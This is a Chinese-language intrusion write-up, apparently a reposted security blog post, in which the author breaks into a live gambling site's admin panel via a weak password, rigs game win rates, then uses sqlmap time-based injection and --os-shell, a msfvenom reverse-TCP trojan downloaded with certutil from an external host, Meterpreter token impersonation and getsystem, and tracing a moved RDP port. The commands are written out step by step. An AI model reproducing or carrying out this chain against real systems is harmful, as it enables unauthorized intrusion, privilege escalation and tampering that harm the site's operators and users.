0x01 前言

在某某附近人發來送¥的邀請截圖,在棋牌捕魚上面把贈送的金額打光之后、隨之來做個滲透測試....通過意見反饋打到后臺地址以及cookie過期....之后

0x02 開始滲透
開局一個后臺

界面挺不錯的有點高級高級的感覺,咱先來試試弱口令

咦....直接進去了。隨后把賬戶的勝利調到了百分比


打了一上午魚之后,金幣高達52w
突然感覺好像有點什么不對,,,,咱是來做滲透的不是來捕魚的吧
滲透棋牌不登陸到服務器界面怎么合適呢

咳咳...繼續滲透
后臺沒有上傳點 配置文件也不知道路徑在哪 ...有點棘手
我們回到登陸框 在賬戶上加個單引號試試看看有沒有sqli

嗯哼..點登陸沒反應抓包sqlmap一把梭

嗯...很強 存在延時注入
我們繼續看看是否dba權限

ture看來運氣很好啊 直接--os-shell

權限有點小啊 ,,,但問題不大 掏出我們的msf
msfvenom -p windows/meterpreter/reverse_tcp lhost="外網ip地址" lport="監聽端口" -f exe > msf.exe 生成木馬
放置外網方便使我們的目標服務器下載
先在目標服務器創建一個放置木馬的文件夾
md c:\test
我們使用certutil.exe進行下載
certutil.exe -urlcache -split -f “木馬下載地址” C:\test\test.exe

木馬下載成功我們回到msf
設置使用exploit/multi/handler模塊

設置payload

show options 看看需要配置的參數

set LHOST “外網ip” //于木馬的ip一致set LPORT "端口" //于木馬的監聽端口一致
隨后 run執行

緊接著目標服務器運行木馬

成功反彈shell


因為我們的權限太小所以我們現在要先進行提權
使用use incognito來加載會話令牌模塊
然后list_tokens -u來列出會話令牌

使用impersonate_token "WIN-IGSV8O3CA7E\Administrator" 盜取 administrator 令牌 getuid查看一下

嘿嘿嘿 
最最最后使用getsystem來獲取system權限

咳咳 接下來就是shell進入

cmd提取命令一把梭
接下來就是快快樂樂的登陸遠程服務器了
美滋滋的~~
(然而事情沒那么簡單~)
咦....

內部出現錯誤 咋回事了....難道遠程端口被改了嗎。。。。

nmap出動掃描一下端口

沒有開放3389 ...... 確定以及肯定是改端口了我們回到shell看看
執行 tasklist /svc
找到svchost.exe進程下termservice服務對應的PID

再執行netstat -ano
根據PID號查找對應遠程端口,遠程端口為5566端口

嘿~這次能完美手工了吧


Very Good~ 
系統安全運維
LemonSec
系統安全運維
LemonSec
LemonSec
安全牛
安全牛
一顆小胡椒
瀟湘信安
FreeBuf
信息安全與通信保密雜志社
天億網絡安全